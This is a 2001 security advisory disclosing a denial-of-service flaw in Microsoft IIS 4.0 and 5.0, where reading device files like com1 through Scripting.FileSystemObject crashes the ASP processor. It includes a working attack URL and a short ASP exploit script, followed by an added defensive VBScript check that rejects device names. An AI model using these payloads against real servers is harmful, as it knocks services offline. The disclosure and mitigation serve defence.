Microsoft Internet Information Services (IIS) local and remote DoS

Release Date:
July 5, 2001

Severity:
High

Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0

Description:
Opening and reading device files (com1, com2, etc.) using Scripting.FileSystemObject will crash the ASP processor (asp.dll).

Example:
1. Local exploit:
If you have permission to create an .asp file, you can crash the ASP processor.

2. Remote exploit:
Sometimes a file name is passed as a parameter to an ASP script, which opens the file and reads data from it. Passing a device file name as the parameter will
crash the ASP processor.

               http://host.int/scripts/script.asp?script=com1




3. ASP-Exploit:

<%
               Dim strFileName, objFSO, objFile
               
               Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
               
               strFileName = "com1"
               
               Set objFile = objFSO.OpenTextFile(strFileName)
               
               Response.Write objFile.ReadAll
               
               objFile.Close
%>


Solution
Fix Scripting.FileSystemObject (it has to check that the file exists before opening it).
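
A script-level check for the remote case, as an added example that is not part of the original advisory: the script refuses device names before the parameter reaches OpenTextFile. BASE_DIR, IsDeviceName, IsPlainName and ReadUserFile are hypothetical names, and the RegExp object assumes VBScript 5.0 or later.

```vbscript
<%
' Added example, not code from the advisory or from Microsoft.
' BASE_DIR and the function names are hypothetical; RegExp needs VBScript 5.0+.
Const BASE_DIR = "C:\Inetpub\data\"   ' assumed directory of readable files

' True when the name resolves to a DOS device. Windows ignores an extension
' and a trailing colon, so "com1", "COM1:" and "com1.txt" all hit the device.
Function IsDeviceName(strName)
    Dim objRe
    Set objRe = New RegExp
    objRe.IgnoreCase = True
    objRe.Pattern = "^\s*(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])\s*([.:].*)?$"
    IsDeviceName = objRe.Test(strName)
End Function

' True for a plain file name only: no path separators, drive letters,
' colons or spaces, so the device check always sees the whole name.
Function IsPlainName(strName)
    Dim objRe
    Set objRe = New RegExp
    objRe.Pattern = "^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?$"
    IsPlainName = objRe.Test(strName)
End Function

' Returns the file contents, or Null when the request is refused.
Function ReadUserFile(strName)
    Dim objFSO, objFile, strPath
    ReadUserFile = Null
    If Not IsPlainName(strName) Then Exit Function
    If IsDeviceName(strName) Then Exit Function

    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    strPath = BASE_DIR & strName
    If Not objFSO.FileExists(strPath) Then Exit Function

    Set objFile = objFSO.OpenTextFile(strPath, 1)   ' 1 = ForReading
    ReadUserFile = ""
    If Not objFile.AtEndOfStream Then ReadUserFile = objFile.ReadAll
    objFile.Close
End Function

Dim strData
strData = ReadUserFile(CStr(Request.QueryString("script")))
If IsNull(strData) Then
    Response.Status = "400 Bad Request"
Else
    Response.Write Server.HTMLEncode(strData)
End If
%>
```

The device check runs before any FileSystemObject call, so the decision to refuse a name never depends on how the component itself treats device files.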

Vendor Status:

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Hyperlinks
http://www.nerf.f2s.com/

Credits

Found by buggzy (buggzy@nerf.ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)